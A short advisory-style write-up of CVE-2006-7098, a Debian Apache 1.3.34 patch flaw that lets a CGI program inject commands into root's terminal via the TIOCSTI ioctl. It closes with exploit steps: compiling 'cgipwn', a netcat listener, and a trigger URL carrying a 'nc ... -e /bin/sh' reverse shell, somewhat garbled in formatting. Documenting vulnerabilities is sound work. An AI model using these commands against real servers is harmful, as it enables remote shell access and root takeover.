CVE-2006-7098

A local attacker can exploit this by executing a CGI program that utilizes the TIOCSTI ioctl. This ioctl allows the program to inject characters into the controlling terminal. If the httpd process was started interactively by a privileged user (e.g., root), the attacker can effectively gain control of that user's terminal session, leading to arbitrary command execution. The advisory notes that CGI execution privileges are required and the service must be started manually by root via a shell [ref_id=1].

The vulnerability lies within the Debian GNU/Linux 033_-F_NO_SETSID patch applied to the Apache HTTP Server 1.3.34-4. Specifically, the issue occurs when httpd is started interactively and does not properly disassociate from its controlling tty. A CGI program can then leverage this by calling the TIOCSTI ioctl to inject commands into the tty [ref_id=1].

The advisory does not provide details on the specific patch or its implementation. However, the vulnerability is described as a failure to properly disassociate httpd from a controlling tty when started interactively. A correct fix would ensure that the httpd process properly detaches from its controlling terminal, preventing child processes like CGI programs from manipulating it via ioctls such as TIOCSTI.

```bash # Compile the exploit gcc -o /path/to/cgi-bin/cgipwn cgipwn.c

# Start a listener on your attacking machine nc -vvv -l -p 31337

# Trigger the exploit via a web request to the CGI script # Assuming the web server is accessible and the CGI script is placed correctly # The URL below is an example, the actual URL will depend on the web server configuration # http://webserver/cgi-bin/cgipwn?nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d ``` [ref_id=1]